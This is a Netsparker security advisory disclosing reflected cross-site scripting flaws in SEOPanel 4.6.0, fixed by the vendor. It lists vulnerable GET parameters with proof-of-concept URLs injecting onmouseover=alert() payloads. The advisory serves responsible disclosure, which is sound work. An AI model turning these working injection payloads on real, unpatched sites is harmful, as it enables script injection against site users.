Information
--------------------

Advisory by Netsparker
Name: Cross-Site Scripting Vulnerabilities in SEOPanel
Affected Software: SEOPanel
Affected Versions: 4.6.0
Vendor Homepage: https://www.seopanel.org/
Vulnerability Type: Cross-Site Scripting
Severity: Important
Status: Fixed
CVSS Score (3.0): 7.4 (High)
Netsparker Advisory Reference: NS-20-005

Technical Details
--------------------

SEO Panel root was at http://localhost:8080

Cross-site Scripting in Directories.php

URL: http://localhost:8080/directories.php?capcheck=%27%22%20ns%3dnetsparker(0x00E4E5)%20&dir_name=&langcode=&pagerank=&sec=directorymgr&stscheck=1 
Parameter Name: capcheck
Parameter Type: GET  
Attack:   '" ns=netsparker(0x00E4E5)
Proof URL: http://localhost:8080/directories.php?capcheck=%27%22%20onmouseover%3dalert(0x00E4E5)%20&dir_name=&langcode=&pagerank=&sec=directorymgr&stscheck=1

Cross-site Scripting in seo-plugins-manager.php (5)

URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20ns%3dnetsparker(0x01434E)%20
Parameter Name: stscheck
Parameter Type: GET  
Attack:   '" ns=netsparker(0x01434E)
Proof URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20onmouseover%3dalert(0x01434E)%20

URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20ns%3dnetsparker(0x00E492)%20
Parameter Name: stscheck
Parameter Type: GET  
Attack:   ''" ns=netsparker(0x00E492)
Proof URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20onmouseover%3dalert(0x00E492)%20

URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?pageno=%27%22%20ns%3dnetsparker(0x011A0C)%20&pid=1&sec=listinfo
Parameter Name: pageno
Parameter Type: GET  
Attack:   ''" ns=netsparker(0x011A0C)
Proof URL:http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?pageno=%27%22%20onmouseover%3dalert(0x011A0C)%20&pid=1&sec=listinfo

URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=%27%22%20ns%3dnetsparker(0x01B8AB)%20&pid=1&sec=listinfo&stscheck=select
Parameter Name: pageno
Parameter Type: GET  
Attack:   '" ns=netsparker(0x01B8AB)
Proof URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=%27%22%20onmouseover%3dalert(0x01B8AB)%20&pid=1&sec=listinfo&stscheck=select

URL: http://localhost:8080/seo-plugins-manager.php?pageno=%27%22%20ns%3dnetsparker(0x00DC5E)%20&pid=1&sec=listinfo
Parameter Name: pageno
Parameter Type: GET  
Attack:   ''" ns=netsparker(0x00DC5E)
Proof URL: http://localhost:8080/seo-plugins-manager.php?pageno=%27%22%20onmouseover%3dalert(0x00DC5E)%20&pid=1&sec=listinfo

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------

2nd November 2020 - First Contact
30th November  2020 - Vendor Fixed
28th December 2020 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Timur Guvenkaya while testing the Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanner finds and reports security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be highly accurate in reporting vulnerabilities.